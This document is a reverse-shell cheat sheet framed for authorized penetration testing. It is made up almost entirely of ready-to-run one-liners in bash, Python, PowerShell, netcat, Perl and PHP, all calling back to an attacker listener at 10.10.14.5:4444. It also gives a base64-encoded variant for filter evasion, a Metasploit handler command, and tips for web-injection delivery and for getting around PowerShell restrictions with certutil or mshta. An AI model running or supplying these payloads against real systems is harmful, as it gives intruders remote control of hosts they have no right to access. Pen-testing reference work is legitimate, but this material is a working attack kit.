Reverse Shells Cheat Sheet
One-liners and staged payloads for bash, Python, and PowerShell reverse shells during authorized penetration tests.
Overview
A reverse shell connects outbound from the target to your listener. Set up nc, rlwrap, or Metasploit handler first, then execute the appropriate one-liner for the target OS and available interpreter.
Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.
Install
Listener (attacker)
sudo apt install -y netcat-openbsd rlwraprlwrap nc -lvnp 4444Upgrade shell after connect
python3 -c 'import pty;pty.spawn("/bin/bash")'Essential commands
Attacker listener
nc -lvnp 4444rlwrap -cAr nc -lvnp 4444msf handler
msfconsole -q -x "use exploit/multi/handler; set payload linux/x64/shell_reverse_tcp; set LHOST 10.10.14.5; set LPORT 4444; run"Common workflows
TCP bash
bash -i >& /dev/tcp/10.10.14.5/4444 0>&1Bash 196
0<&196;exec 196<>/dev/tcp/10.10.14.5/4444; sh <&196 >&196 2>&196Bash with base64 (filter bypass)
bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41LzQ0NDQgMD4mMQ==' | base64 -d | bashPython 3
python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'Python 2
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'PowerShell reverse TCP (Windows target)
powershell -nop -c "$c=New-Object Net.Sockets.TCPClient('10.10.14.5',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$r2=$r+'PS '+(pwd).Path+'> ';$sb=([Text.Encoding]::ASCII).GetBytes($r2);$s.Write($sb,0,$sb.Length)}"Encoded (shorter on cmdline)
powershell -e BASE64_ENCODED_COMMANDnc traditional
nc -e /bin/sh 10.10.14.5 4444rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 4444 >/tmp/fPerl
perl -e 'use Socket;$i="10.10.14.5";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'PHP
php -r '$sock=fsockopen("10.10.14.5",4444);exec("/bin/sh -i <&3 >&3 2>&3");'On target (after bare shell)
python3 -c 'import pty;pty.spawn("/bin/bash")'export TERM=xtermFlags reference
LHOST / IP | Your VPN/tun0 IP reachable from target |
|---|---|
LPORT | Listener port (443/80 less filtered) |
rlwrap | Readline for job control |
msfvenom -f elf/exe/ps1 | Staged payloads vs one-liners |
Firewall | Outbound rules may block — try 53, 443 |
Tips
- Prefer reverse over bind when target is behind NAT; bind when you are inbound to target.
- URL-encode one-liners in web injection; watch for &, quotes, length limits.
- PowerShell Constrained Language may block iex — try alternatives (mshta, certutil download).
- Upgrade to meterpreter or socat for full TTY: socat file:\tty\,raw,echo=0 tcp-listen:4444.